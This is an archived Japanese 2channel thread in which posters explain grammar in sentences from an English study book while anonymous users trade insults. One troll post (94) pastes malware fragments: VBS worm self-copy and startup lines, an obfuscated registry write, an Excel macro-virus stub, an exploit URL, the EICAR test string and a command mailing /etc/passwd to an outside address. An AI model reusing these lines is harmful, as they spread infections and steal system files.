2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

新・基本英文700選を解説するスレ

1 :名無しさん@英語勉強中:2006/11/28(火) 23:14:15
伝説の名著『新・基本英文700選』を品詞分解+文法解説して最強の構文集にするスレです。
出口さんによる品詞分解の完了後、文法などの解説を進めています。
(このスレは統合初代スレとなります)

【品詞分解・まとめサイト】
http://www.geocities.jp/basic_grammar/
【文法解説・まとめサイト】
http://complete-700.hp.infoseek.co.jp/

【品詞分解・初代スレ】
http://academy3.2ch.net/test/read.cgi/english/1087304963/
【品詞分解・2代目スレ】
http://academy3.2ch.net/test/read.cgi/english/1109486600/
【品詞分解・3代目スレ】
http://academy4.2ch.net/test/read.cgi/english/1115916598/
【文法解説スレ】
http://academy4.2ch.net/test/read.cgi/english/1157282671/

2 :名無しさん@英語勉強中:2006/11/28(火) 23:18:05
2

3 :名無しさん@英語勉強中:2006/11/28(火) 23:31:13
>>1
悪いな

4 :名無しさん@英語勉強中:2006/11/28(火) 23:36:06
テンプレに追加しとけ

―スレタイ―
荒してください
http://human5.2ch.net/test/read.cgi/dame/1160231712/
88 :名無しさん@毎日が日曜日 :2006/10/29(日) 17:30:43 ID:IggTJZdP
新・基本英文700選を文法的に解説するスレ
http://academy4.2ch.net/test/read.cgi/english/1157282671/456


5 :寺岡:2006/11/29(水) 00:40:41
19番がやっとわかりかけてきました。
前スレの478さん丁寧な解説ありがとうございました。
お勧めの「英文法解説」(金子書房)を買いました。

6 : ◆IuJiIQCtrs :2006/11/29(水) 00:50:38
乙。

>勝手口さん、西川口さん
前スレの978・982について、西川口さんの982の説明が近い。
思ったのはネクサスで和訳すると文の論点がぼやけちゃう事。
特にhelpは、使役動詞とは意味合いを一線を隠してやらせることに話の焦点がない。
なんかネクサスで訳すとSVthat文みたいにネクサス部分全体が動詞に作用されて一意を作ってるような錯覚をおこしちゃう。
文意を突き詰めれば
This medicine will help.She help her mother.なんだよね。
「この薬を飲めば腹痛がおさまるでしょう」って日本語から英文の文意「この薬効くよ」をどれだけの人が抽出できるだろうか。

1.I saw the gentleman enter a store.
2.I saw the gentleman entered a store.
1は突き詰めればI saw the gentleman.
2は突き詰めてもI saw (the gentleman entered a store).若しくはI saw that.

7 :名無しさん@英語勉強中:2006/11/29(水) 00:55:40
消えろ

8 :名無しさん@英語勉強中:2006/11/29(水) 08:31:33
空気読めない馬鹿6のせいでまた荒れるorz

9 :名無しさん@英語勉強中:2006/11/29(水) 10:06:57
エロ消えろܷܵܶ

10 :名無しさん@英語勉強中:2006/11/29(水) 16:47:54
英文法解説ムズくね?

11 :名無しさん@英語勉強中:2006/11/29(水) 16:49:48
スレ違い

12 :名無しさん@英語勉強中:2006/11/29(水) 17:14:00
スレチカイ

13 :名無しさん@英語勉強中:2006/11/29(水) 18:27:18
>>11
Shut up

14 :名無しさん@英語勉強中:2006/11/29(水) 18:30:43
>>10>>5に対してのレス・・・じゃないの?

15 :名無しさん@英語勉強中:2006/11/29(水) 20:57:36
なるほど、繋がるね。
それにしてもスレ違いのネタを引っ張る奴もスレ違いだし、
最悪でもアンカ-くらいつけてもらわないと。
間に粘着コテの長文が挟まってるから唐突なレスに見える。

16 :名無しさん@英語勉強中:2006/11/29(水) 21:01:44
444:寺岡 2006/05/21 22:48:19 [sage]
本日、新・基本英文700選を購入しました。
未熟者ですが、なるべく自力で品詞分解しようと思います。
よろしくお願いします。

17 :勝手口 ◆KatteG.R4k :2006/11/29(水) 21:33:00
>>1
乙です。

>>6
説明ありがとうございます。
でも、前にも書きましたが、「S V O to do/S V O C は突き詰めると S V O だ」という考え方には、
まったく賛同できません。学習者にとっても役に立たないと思います。
1は突き詰めても I saw the gentleman enter a store. だと考えます。
(S V O to do/S V O C を内容や用法で区分することは有用だと思います)

「S V O to do/S V O C」と「S V that...」の両方をとる動詞の場合、
文意が異なるとすれば、直接的か間接的かという点であり、ネクサスか否かではないと思います。
(例:「see that...」は「直接見える」ではなく「(新聞などで)見る/知る、話が見えてくる/わかる」)

>思ったのはネクサスで和訳すると文の論点がぼやけちゃう事。
ネクサスは「英文を理解する」ためのものであって、和訳の技巧ではありません
(和訳の技巧が必要となるのは、英文を正読した後の話です)。
I saw him crossing the street. (§171-(1))
The bear stood there with his tongue hanging out. (§335-(1)-【7】)
などは、ネクサスを意識しないと、返り読みをして誤読する可能性があります。

>「この薬を飲めば腹痛がおさまるでしょう」って日本語から英文の文意「この薬効くよ」をどれだけの人が抽出できるだろうか。
抽出できないとも思いませんが、訳文は文脈に依存するものなので、いろいろ可能性があるでしょう。
むしろ重要なのは、「この薬を飲めば腹痛がおさまるでしょう」を英語で表現したいときに、
「This medicine will help relieve your stomachache.」という文章形式を、選択肢の1つとして思いつくことだと思います。

なお、help は、allow、force などと同類とされ(江川 p.330)、使役動詞として区分されることもあります。
(§170 使役動詞、[2] get, help, bid の用法、(2) help,bid)(江川 pp.335-336)
また、『Practical English Usage』では、使役動詞や知覚動詞(感覚動詞)と help とを区別していません。
(PEU, §281 infinitives (3), [2] after let, make, hear etc)

長文、失礼しました。

18 :勝手口 ◆KatteG.R4k :2006/11/29(水) 21:34:10
253.(名詞表現:動詞派生名詞)
S / has / a {good→} <reading→ knowledge> {←of French}. (文型:S V O)
【直訳風】「彼は、フランス語に関する十分なリーディングの知識をもっている」

動詞から派生した名詞は、元の動詞に「こと」を付ける感じで意味をとらえると良いと思います。
know → knowledge(知っているということ)、see → sight(見えること)、think → thought(考えること)
該当箇所:
「§72 名詞の慣用表現」(特に、[3]〈動詞+名詞〉の慣用表現 名詞表現)
参考:
He has a knowledge of French.(彼はフランス語が少しできる)
(§44 抽象名詞、(2) 程度の多少を表すとき、[参考] a=some)
I hate the sight of him.(訳例:彼の姿を見るとぞっとする)
(行方昭夫『英語の発想がよくわかる表現50』p.85)

「a good (形) 名」の good は、「量的に十分/たっぷり」を表すことがあります。
辞書で確認しておきましょう。

cf. He knows how to read French very well.


254.(名詞表現:動詞派生名詞)
S / can take / O / M2((when s v x)). (文型:S V O)
【直訳風】「私は、この仕事が終わったら、かなり長い休みをとることができる」

when節内は、S / is / finished (文型:S V C)(受動態)

cf. I can rest for a good long time.

19 :名無しさん@英語勉強中:2006/11/29(水) 22:19:31
700選とDUOってどっちが全部暗記楽ですか?

20 :名無しさん@英語勉強中:2006/11/29(水) 22:20:53
しねばいいのに

21 :名無しさん@英語勉強中:2006/11/29(水) 22:21:30
>>19
マルチは市ね

22 :名無しさん@英語勉強中:2006/11/29(水) 23:00:07
>>21
シネマルチハシネ

23 :名無しさん@英語勉強中:2006/11/30(木) 00:27:52
エロもちつけ

24 :西川口 ◆Im4lkGa4xk :2006/11/30(木) 02:13:11
>>1
スレ立て乙です。

98の文
I was waiting for (the rain to stop). (雨がやむのを待っている)
the rain stops. を、不定詞で名詞化→(for) the rain to stop (雨がやむコト)
wait for の 目的語にすると、forがダブるので1個省略。

もうひとつのネクサスにも注目して、
(I was waiting for the rain) to stop.(私は雨を待っています、やむのをね。)
雨乞いの話を期待させておいて、後から意味を逆転させる感じ。(シチュエ―ションによりますが...)
こういうリズムが英語の妙味なのかとも思ったりします。

参照
wait for the rain to stop については、前文法スレの>>214 勝手口氏の解説
kindly については、前スレの>>796 勝手口氏の解説(225の文のwisely について)
give me a ride については、前文法スレの>>426

25 :名無しさん@英語勉強中:2006/11/30(木) 09:23:53
西口さんは初心者向けの解説が上手いネ。
ロイヤルを使いこなせない俺にも良く分かる!

26 :名無しさん@英語勉強中:2006/11/30(木) 10:29:13
エロに対するあてつけだろ。自演乙

27 :名無しさん@英語勉強中:2006/11/30(木) 10:57:19
こんなエサに食いつくものかw

28 :名無しさん@英語勉強中:2006/11/30(木) 16:05:09
エロキタ━━(゚∀゚)━━!!

29 :勝手口 ◆KatteG.R4k :2006/11/30(木) 22:44:36
255.(名詞表現:動詞派生名詞)
Don't / S / wish / to v x? (文型:S V O)(疑問文)
【直訳風】「あなたは、熱気球に乗って飛ぶことを行ってみたいと思いませんか」

to不定詞のところは、
make / a flight {←in a <hot air→> balloon} (文型:(S) V O)

cf. Don't you wish to fly ((in a hot air balloon))?


256.(名詞表現:動詞派生名詞)
S / will give / O1 / O2 / M2((in...two)). (文型:S V O O)
【直訳風】「私は、一両日中に、あなたに返事を与えます」

cf. I will answer you.

30 :名無しさん@英語勉強中:2006/11/30(木) 22:46:36
勝手口さんはオーバー初心者向けの解説が上手いネ。
700選を使いこなせない俺にも良く分かる!

31 :名無しさん@英語勉強中:2006/12/01(金) 01:14:04
まとめサイトの人、まだ解説が出来てないところの
リンク外してくれると紛らわしくなくていいかも
ついでにメニューに例文番号も書いてあるといいかもしれません
例えば時制(257-284)みたいに

32 :西川口 ◆Im4lkGa4xk :2006/12/01(金) 01:55:23
99の文(前文法スレで既に解説済という気もしますが)

You can depend on (the timetable to tell you.....)
(時刻表が...を教えてくれるコトに、頼ることができる。)
the timetable tells you... を、不定詞で名詞化→(for) the timetable to tell you...
これがdepend on の目的語になったので、for が消えた形。

主文のネクサスに注目すると、
(You can depend on the timetable) to tell you...
(時刻表に頼ることができる、(時刻表が)... を教えてくれることに関して)

どちらの見方が正しいかより、timetable を軸にした2つのネクサスを意識できたら
それでいいのではないかと、個人的には思ってます。

前文法スレで活発に議論されてたところなので、是非参照してみてください。
>>321->>359

tell you when trains leave
trains leave を、接続詞when で名詞化。that と違うのは、(...する時)という訳。
(あなたに、列車が出る時を教える)
文の構造は give系の4文型。

33 :名無しさん@英語勉強中:2006/12/01(金) 16:56:38
>>31
調子のるな。
厨房は誰かが親切するとすぐ付け上がるから原辰ナリ。
三人の解説者やまとめサイトの管理者には謙虚に接して欲しい。
最後のは31だけじゃなくてこのスレの住人にもお願いします

34 :名無しさん@英語勉強中:2006/12/01(金) 17:28:42
誰か、まとめサイトを携帯で見れるようにしてください。


35 :名無しさん@英語勉強中:2006/12/01(金) 18:51:11
>>34
普通に携帯から見れるだろ。専ブラ使わなくても。
それに誰か見れるようにしてくれって言った所で結局管理人しかできないよね?
これだから厨(ry

36 :名無しさん@英語勉強中:2006/12/01(金) 18:58:25
方法ならあるだろ。
>>35も厨房だな。

37 :名無しさん@英語勉強中:2006/12/01(金) 19:47:10
>>36
厨房って言われて悔しかったの?

38 :名無しさん@英語勉強中:2006/12/01(金) 20:36:16
>>35
この前、見ようとしたときは接続悪かったぽいです。無事、見れました。
ありがとうごさいました。


39 :名無しさん@英語勉強中:2006/12/01(金) 20:51:44
まとめサイトをいいサイトにしたいと思うだけなんだが・・・。

40 :名無しさん@英語勉強中:2006/12/01(金) 21:50:17
>>33
>>31は別に調子にのってなんかないと思うが。
何シキってんだ?意見も書いちゃいけないのか?

41 :勝手口 ◆KatteG.R4k :2006/12/01(金) 22:45:59
>>32
「2つのネクサス」という考え方からすると、大きく分けて、
(1):【S V ≪O to do≫】
(2):【S V ≪O】 to do≫
という2つの類型がありそうですね(江川 pp.329-332、安藤 pp.215-217)。
(1)のパターンだと、ネクサス全体が「ネクサス目的語」とみなされ、
(2)のパターンだと、O が目的語として独立していて、
to が「方向」という基本イメージを保持している、といった傾向があるようです。

この視点から、工口さんの発言を再解釈するなら、
help O (to) do は、to が省略されることから使役動詞に分類されることもあるが、元来 (2)のパターンであるから、
O を、ネクサスの主語としてだけでなく、独立した目的語としてとらえる必要がある、
と修正できると思います。

42 :勝手口 ◆KatteG.R4k :2006/12/01(金) 22:48:57
さて、B-1 に進もうと思います。

257.(現在形:現在の性質・状態)
S / stands / A((on...hillside)) // and // commands / O. (文型:S V A and V O)

単純現在形は、基本的に「いつものこと、現在の事実」を表します。
状態動詞 - 持続的な性質・状態
動作動詞 - 習慣的な動作・反復的な出来事

西川口さんなどが各所で説明してらっしゃるのでそれぞれ確認してください。

該当箇所:
「§182 現在時制 (Present Tense)、[2] 現在時制の表す意味」

43 :西川口 ◆Im4lkGa4xk :2006/12/02(土) 00:12:03
>>41
>(2):【S V ≪O】 to do≫

カッコの使い方がうまいっす。イメ―ジ通りです。
前半と後半のどちらのネクサスに重きを置くかは、「状況による」としか、
今の俺には言えないですが、orz

44 :西川口 ◆Im4lkGa4xk :2006/12/02(土) 00:17:34
100の文
「あいつって、そのくらいすげぇ優しい性格だよな」と唐突に言われたら、どうでしょう。
「そのくらい」ってどのくらい?と聞き返したくなります。
それが such ... that ... 構文。どのくらい優しいかは、that 以下で説明。
「大声出すの聞いたことがねぇよ、(そのくらい優しい性格)」

such は、「すごく」という反面、どのくらいすごいかは、後から説明しますよ
という目印みたいなものです。機能的には、so と同じ。

I have never heard (him speak in a loud voice)
He speaks in a loud voice を、不定詞で名詞化 (for) him (to) speak in a loud voice
heard の目的語になって、for と to が消えた形。原型不定詞という呼び名もなんとなくわかります。
彼が大声で話すコトを聞いたことがない。

もうひとつのネクサスは、
(I have never heard him ) speak in a loud voice.
(今までそんな彼を)聞いたことがない、(彼が)大声で話すのを

....と、今までの理屈で説明しましたが、個人的には、(heard him speak) がひとかたまりに
感じます。

45 :36:2006/12/02(土) 08:03:34
>>37
オマエが厨房だろ。俺を34と思ったんだろ
フルブラウザやアプリ以外にも変換ツールがあるだろ

46 :名無しさん@英語勉強中:2006/12/02(土) 10:53:41
いい加減にしろ屑

47 :名無しさん@英語勉強中:2006/12/02(土) 11:09:11
>>46
終わってる話を蒸し返すなよ。オマエも屑だな。

48 :名無しさん@英語勉強中:2006/12/02(土) 11:20:32
フルブラウザやjigBrowser,ibisBrowser、PCサイトビューア使えばいいだろう。
ttp://tool-1.net/?id=kt&pn=15

http://hobby7.2ch.net/test/read.cgi/chakumelo/1164845516/
http://hobby7.2ch.net/test/read.cgi/chakumelo/1153929534/

49 : ◆IuJiIQCtrs :2006/12/02(土) 13:15:36
>I have never heard him speak in a loud voice
一息で読まないとするとどこで区切る?

1.I have never heard /him speak in a loud voice
2.I have never heard him /speak in a loud voice
3.I have never heard him speak/ in a loud voice

>to が省略されることから使役動詞に分類されることもあるが
最近の動きですよね。口に馴染んできたから取れただけのこと。
補足としてのto不定詞からネクサスみたいな主語述語関係を意識しだしたからじゃないかな?
昔は知覚構文だってto入ってたんだから。

50 :名無しさん@英語勉強中:2006/12/02(土) 14:43:15
>>45
厨房と言われて悔しかったのか完全に迷走し、どつぼにはまってますね(笑)。

51 :名無しさん@英語勉強中:2006/12/02(土) 14:44:49
これがエロ叩き厨房の実体だなw

52 :名無しさん@英語勉強中:2006/12/02(土) 14:48:11
またエロの自演か

53 :名無しさん@英語勉強中:2006/12/02(土) 15:02:09
>>52
かなり即レスだけどエロ叩くためにこのスレ張り付いてるの?
キンモーw

54 :名無しさん@英語勉強中:2006/12/02(土) 15:33:30
>>50
自己紹介乙

55 :名無しさん@英語勉強中:2006/12/02(土) 15:50:13
何だこのスレ

56 :名無しさん@英語勉強中:2006/12/02(土) 15:56:09
>>53
こいつエロじゃね?

57 :名無しさん@英語勉強中:2006/12/02(土) 16:23:32
>>54見苦しいですよ

58 :名無しさん@英語勉強中:2006/12/02(土) 16:30:58
>>57
自演乙

59 :名無しさん@英語勉強中:2006/12/02(土) 16:36:26
何このスレw

1部のコテの情報交換と、名無し厨坊どものどつきあいの共存?

60 :名無しさん@英語勉強中:2006/12/02(土) 16:39:16
以上>>59の自演でおおくりいたしました。

61 :名無しさん@英語勉強中:2006/12/02(土) 16:57:23
>>49
いろいろ乙

62 :名無しさん@英語勉強中:2006/12/02(土) 16:59:23
エロが来るといつもこうだ

63 :名無しさん@英語勉強中:2006/12/02(土) 17:07:38
以上>>62の自演でうまくまとまりました。

64 :名無しさん@英語勉強中:2006/12/02(土) 17:37:29
以上>>63様の自演でした。お疲れ様でした

65 :名無しさん@英語勉強中:2006/12/02(土) 20:20:32
>>49
おとなげない。
貴様が消えれば全て丸くおさまるのに荒らしたいわけ?

66 :名無しさん@英語勉強中:2006/12/02(土) 20:33:37
と馬鹿が言っております

67 :名無しさん@英語勉強中:2006/12/02(土) 20:48:01
>>66
こいつエロじゃね?

68 :名無しさん@英語勉強中:2006/12/02(土) 20:56:47
エロは、コテ付きでも痛い発言するだろ。
他のは、すべて別人。名無しで煽り屋がいるんだって。
いい加減気付け。

69 :名無しさん@英語勉強中:2006/12/02(土) 21:06:15
エロにリア厨と言われたヤツが粘着してるんだろうなw

70 :西川口 ◆Im4lkGa4xk :2006/12/02(土) 21:58:42
>>49
>一息で読まないとするとどこで区切る?
>1.I have never heard /him speak in a loud voice
>2.I have never heard him /speak in a loud voice
>3.I have never heard him speak/ in a loud voice

考えれば考えるほどわからなくなってきたので、w
読む場合ではなく、話す場合を想定して考えてみました。

1の場合は、文の途中で区切るかたちになるので、聞き手の注意を引き付けることは
できそうです。が、そこで間を取るのであれば、he spoke ...と続けたくなります。

2と3は、前半部分だけでも完結した文なので、区切りは良さそうです。
speak in a loud voice のまとまり感が強いので、2の区切りが妥当でしょうか。

ただ、スラッシュのところであまり間を取りすぎると、
「彼は極端に無口?」もしくは「しゃべれない?」みたいな誤解も生じそうです。
him で区切ったとしても、すぐ speakと続けたいですね。

71 :名無しさん@英語勉強中:2006/12/02(土) 22:47:57
んで>>69がリア厨でおk?

72 :名無しさん@英語勉強中:2006/12/02(土) 22:48:40
おkwwwwwwwwwwwwwwwwwwwwww


73 :名無しさん@英語勉強中:2006/12/02(土) 22:55:25
すぐ反応することで自演と見せたいのか?
今日は一段とエロのj(ry

74 :名無しさん@英語勉強中:2006/12/02(土) 23:06:20
685 名前:工口【たくみぐち】 ◆IuJiIQCtrs [sage] 投稿日:2006/10/25(水) 21:22:53
瀕死分解の方のスレ立て人か住人のリア厨が独りで荒しまわってるってことでFA?
引き篭もってないでたまには日光を浴びろ。
それと去る前に自分のレスは削除依頼しとけよ。

75 :名無しさん@英語勉強中:2006/12/02(土) 23:09:46
>>74
エロに言われてそんなに悔しかったの?それともエロ本人?

76 :名無しさん@英語勉強中:2006/12/02(土) 23:12:35
>受験英語の誤りは沢山あります。
そんならコテと鳥つけて、その批判を展開してってよ。
具体的な例文を挙げてね。
>>640を参考にな。

そうすればみんな勉強になるわけだし。
ここは品詞の粘着以下自演の巣窟なんで名無しがいくら叫んでも無駄。



77 :名無しさん@英語勉強中:2006/12/02(土) 23:12:56
本人だなwwwwwwwwwwwwww

78 :名無しさん@英語勉強中:2006/12/02(土) 23:14:53
まあ所詮、コテも名乗れない名無しが解説と関係ないとこで煽ってるだけなので気にせずやってください。
俺も別にずっと覗いてるわけじゃないから、流れに乗れないこともある。止めたわけじゃないおーw


79 :名無しさん@英語勉強中:2006/12/02(土) 23:16:03
>>75
まあ所詮、コテも名乗れない名無しが解説と関係ないとこで煽ってるだけなので気にせずやってください。
俺も別にずっと覗いてるわけじゃないから、流れに乗れないこともある。止めたわけじゃないおーw

80 :名無しさん@英語勉強中:2006/12/02(土) 23:30:40
>>75=>>79だろw
酷い自演だなぁ

81 :勝手口 ◆KatteG.R4k :2006/12/02(土) 23:38:04
>>49
>>I have never heard him speak in a loud voice
>一息で読まないとするとどこで区切る?
CDでは「3」のようですね。焦点だからだと思います。


258.(現在形:時・条件を表す副詞節での未来の代用)
S / cannot tell / <when s v x>,// (文型:S V O)
but // M2((when s v x)), / S / will do / O. (文型:S V O)

1つ目のwhen節内は、S / will come (文型:S V)
2つ目のwhen節内は、S / comes (文型:S V)

原則は「従属節の動詞の形は、誤解が生じない限りできるだけシンプルに」
(tense simplification in subordinate clauses)
単純未来の will に関する一般的な傾向としては、
副詞節 - 未来のことを言うときでも、形は現在形を使う(主文に will があることが多いから)。
名詞節、形容詞節 - 未来のことを言うときは、will を使う(主文に will がないことが多いから)。

ただし、
名詞節や形容詞節でも、主文で will が使われているなど、
明らかに未来の話の場合には現在形を使います。(PEU, §580)(例文222を参照)

副詞節でも、「主語の意志」を表す場合や、if節が主文の結果を示す場合など、
単純未来でない場合には willを使います。
該当箇所:
「§256 単なる条件と仮想の条件、(1) 単なる条件(開放条件)、[注] If 節内の will」
(PEU, §260。『続 日本人の英語』pp.123-130)

82 :勝手口 ◆KatteG.R4k :2006/12/02(土) 23:38:39
259.(現在形:真理・社会通念)
M2,/ S / did not know / <that s v x> and <that s v x>. (文型:S V O)

1つ目のthat節内は、S / is / C (文型:S V C)
2つ目のthat節内は、S / moves / A((around the sun)) (文型:S V A)

いわゆる「時制の一致の例外」というやつですが、
「普遍の心理は絶対に現在形じゃなきゃいけない」と考えるのは間違いです。
話し手が「現在の事実」だと判断/主張するかどうか、で決まるのであって、
真理かどうか、はあまり関係がありません。
該当箇所:
「§353 現在・過去のままの場合、(1) 現在のままの場合、【1】 不変の真理や社会通念を表すとき」
(『英文法をこわす』pp.165-172)

83 :名無しさん@英語勉強中:2006/12/02(土) 23:41:34
これってちゃんと許可とってやってるのか?
700選は勿論だが、引用としてあげてる文法書なんかも著作権上いいのか?

84 :名無しさん@英語勉強中:2006/12/02(土) 23:54:29
>>83
前スレで確認済みだ

85 :名無しさん@英語勉強中:2006/12/02(土) 23:59:26
訴えられたとしても俺らには関係ねーしw
多分まとめサイト作ってるやつだけが責任取ることになるからそいつ以外心配すんな

86 :名無しさん@英語勉強中:2006/12/03(日) 00:03:33
また1スレ目みたいになっちまったな

87 :名無しさん@英語勉強中:2006/12/03(日) 00:13:05
エロが途中で止めるのが悪い。
そのせいで他の人がターゲットにされてる。
粘着ヤロウなんか無視して解説してくれ。

88 :名無しさん@英語勉強中:2006/12/03(日) 00:15:27
勝手口と西川口ターゲットにされてるか?
エロだけだと思うが?
エロは消えろ。

89 :名無しさん@英語勉強中:2006/12/03(日) 00:15:31
>>80
75以降レスしてないよ。もしや>>75は図星だった?

90 :名無しさん@英語勉強中:2006/12/03(日) 00:23:36
>>88
まあ所詮、コテも名乗れない名無しが解説と関係ないとこで煽ってるだけなので気にせずやってください。
俺も別にずっと覗いてるわけじゃないから、流れに乗れないこともある。止めたわけじゃないおーw

91 :名無しさん@英語勉強中:2006/12/03(日) 00:28:07
勝手口氏解説直後の>>83も攻撃。
今度は携帯とPCで書き込みだろ。
オマエ一人が、ずっと張り付いてるんだよ。

92 :名無しさん@英語勉強中:2006/12/03(日) 00:31:10
>>91
お前が張り付いてんだろうがwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww


93 :名無しさん@英語勉強中:2006/12/03(日) 00:36:24
俺は、オマエにしかレスしてないだろ。
オマエは、全員に攻撃してるし嘘もついてる。レスも速い。

もう止めた。

94 :名無しさん@英語勉強中:2006/12/03(日) 00:40:03
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ


95 :名無しさん@英語勉強中:2006/12/03(日) 00:40:49
今日(厳密には昨日)の昼頃例題(>>49)を出しておきながらその後放置。
西川口氏がわざわざレスつけても放置。
貴方の例題の答えや解説が聞きたくて待ってたものがいた事をお忘れなく。
しかも今日のようなスレ進行ときたら、
名無しで自演してると言われても仕方ないのでは?
たとえ自演をしてないとしても中途半端に解説打ち切って、
その後知らん顔というのは人間として下等。
ウザがられてるのに、今更になって叩かれたからレスは控えました、とかいうオチはありえないだろうし、
失望とともに見損なった。

96 :名無しさん@英語勉強中:2006/12/03(日) 00:42:21
>>93
あ?
勝手に人の所為にして逃げんのか?
言っとくが俺は>>83じゃねーし

97 :名無しさん@英語勉強中:2006/12/03(日) 00:42:27
これで一人の粘着が執拗にエロを攻撃してるの分かっただろ。
エロ帰って来い。

98 :名無しさん@英語勉強中:2006/12/03(日) 00:49:37
>>91
今日ずっと自演してるのがお前というのは分かった。でもなんでこのID非表示のこの板で
>携帯とPCで書き込み
で自演する必要があるかが謎だ。
2chにおける君のルーチンなんか?
はたから見て自爆していく様子が痛い

99 :名無しさん@英語勉強中:2006/12/03(日) 00:53:41
これで一人の擁護か本人が執拗に自演してるの分かっただろ。
現に今、エロの存在を不快に思ってる奴が複数人いる。
擁護自演一人で大変だな

100 :名無しさん@英語勉強中:2006/12/03(日) 00:54:31
エロさんはパス付掲示板のサイトを作るって言ってたけど
あれはどうなってるんでしょう?

101 :名無しさん@英語勉強中:2006/12/03(日) 00:54:59
じゃあラスト。
俺のどれが自演だ?言ってみろ。おれがエロだって言うのか?ただの釣りだぞw

>>88>>89は4秒差だが両方オマエだろ。

102 :名無しさん@英語勉強中:2006/12/03(日) 00:56:17
自演がバレたからって今度は釣りでしたって済ますつもりか?

103 :名無しさん@英語勉強中:2006/12/03(日) 00:59:53
だから、どれが自演なんだ?お互いに自演である証明も、自演でない証明も不可なんだぞ。

煽って荒らしてるだけのヤツに、これ以上協力する気はない。

104 :名無しさん@英語勉強中:2006/12/03(日) 01:01:32
>>101
お前馬鹿か?
>>98が言うように携帯とPCで書き込みとか、お前のやり方で物を見るのやめたら?
まぁ、お前が携帯とPCで自演してるって事が分かっただけでも収穫だよw

105 :名無しさん@英語勉強中:2006/12/03(日) 01:02:58
>>101
エロがただ一人によってしか叩かれていないという精一杯の願望が持ち続けてるのは分かった。
残念だが、その携帯・PCから同時書き込みという発想は全くなかったよ。
自演のプロは流石だw

106 :名無しさん@英語勉強中:2006/12/03(日) 01:06:13
アホか?
携帯とPCの自演は同時刻書き込みか別IDで他人を装わないと自演にならないだろw


107 :名無しさん@英語勉強中:2006/12/03(日) 01:18:54
エロ先生もしくはそのシンパが本職ピックルだったというオチでおk?
萎えたとこで俺も寝よう。よかったら明日起きるまでに>>49の続きの解説してよ。>エロ

どんなに嫌われてようが、中途半端に解説を投げ出すのはだけは良くない。
レスした結果、エロが叩かれても責任はとらないが

108 :名無しさん@英語勉強中:2006/12/03(日) 01:30:38
詭弁のガイドラインの要約
1:事実に対して仮定を持ち出す
2:ごくまれな反例をとりあげる
3:自分に有利な将来像を予想する
4:主観で決め付ける
5:資料を示さず自論が支持されていると思わせる
6:一見関係ありそうで関係ない話を始める
7:陰謀であると力説する
8:知能障害を起こす
9:自分の見解を述べずに人格批判をする
10:ありえない解決策を図る
11:レッテル貼りをする
12:決着した話を経緯を無視して蒸し返す
13:勝利宣言をする
14:細かい部分のミスを指摘し相手を無知と認識させる
15:新しい概念が全て正しいのだとミスリードする
16:さも当然のように未決着事項を前提にする。
17:論点をすりかえる。
18:事実の一部のみを抜き出してミスリードする。
19:相手に譲歩したと見せかけながら、自分の意見を押しつける。
20:条件の包含関係を間違える
21:全てか無かで途中を認めないか、あえて無視する。
22:勝手に極論化して、結論の正当性に疑問を呈する。
23:自分で話をずらしておいて、「話をずらすな」と相手を批難する。
24:ネタと決めつけて議論を停止させる。
25:嘲笑で優位に立った様に振舞う
26:反論の代わりに詭弁ということにしてすます

109 :西川口 ◆Im4lkGa4xk :2006/12/03(日) 02:16:48
>>81
>CDでは「3」のようですね。焦点だからだと思います。
その手があったか!

101の文
The old gentleman crossed the street and entered a store on the corner.
これを不定詞で名詞化
(for) the old gentleman (to) cross the street and (to) enter a store on the corner
saw の目的語になって、for と to が消えます。

the old gentleman (その老紳士)とa store (とある普通の店)
老人は特定されていますが、店は特定されていません。つまり、焦点は老人の行動にあります。
老人を尾行中の刑事のセリフみたいな感じです。

これが逆に an old gentleman (見知らぬ老紳士)とthe store (その店)の組み合わせなら
焦点は店にあります。その店を張り込み中の刑事のセリフのようになります。

on the corner
「接触」のon (その角にくっついて建っている店)→その角の店

「中」のin を使うと、3Dな感じ。in the corner of the room
「点」のat を使うと、何らかの地点、ポイントを示す。面積的な
広がりを感じない。Turn at the corner. (その角をまがれ)

110 :名無しさん@英語勉強中:2006/12/03(日) 13:08:29
>>108
自演がばれたから次はコピペですか?

111 : ◆IuJiIQCtrs :2006/12/03(日) 14:06:43
オマイら俺のいない間にあまりおもしろい事するなよwwwww

とりあえずまじめに>>49前半から
俺は2のつもりだったが、確かにCDは3だよね。でもその項を通して聞いてみると
例えばhelp her mother/prepare breakfastだったし、saw the oldman /cross the streetだった。
不定詞の節が短い事も関係あるのかな?あと強弱強(高低高)なイントネーションにも注目。
